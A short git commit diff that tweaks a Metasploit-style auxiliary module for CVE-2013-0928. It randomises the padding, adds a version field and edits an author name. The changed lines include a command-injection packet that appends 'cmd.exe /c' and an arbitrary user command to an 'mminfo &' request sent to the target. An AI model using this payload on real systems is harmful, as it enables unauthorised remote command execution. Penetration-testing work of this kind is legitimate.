Randomize padding on aux module, fix spacing on exploits

bug/bundler_fix
inkrypto 2014-08-27 20:41:33 -04:00
parent 7e2d474a26
commit 4a479d17a9
1 changed files with 4 additions and 3 deletions

View File

@ -15,11 +15,12 @@ class Metasploit3 < Msf::Auxiliary
injection. injection.
}, },
'Author' => [ 'Author' => [
'Preston Thornburg', # prestonthornburg@gmail.com 'Preston Thornburn', # prestonthornburg@gmail.com
'Mohsan Farid', # faridms@gmail.com 'Mohsan Farid', # faridms@gmail.com
'Brent Morris' # inkrypto@gmail.com 'Brent Morris' # inkrypto@gmail.com
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' => 'References' =>
[ [
[ 'CVE', '2013-0928' ], [ 'CVE', '2013-0928' ],
@ -36,8 +37,8 @@ class Metasploit3 < Msf::Auxiliary
def run def run
connect connect
padding = "\x41" * 512 padding = Rex::Text.rand_text_alpha_upper(512)
packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}" packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}"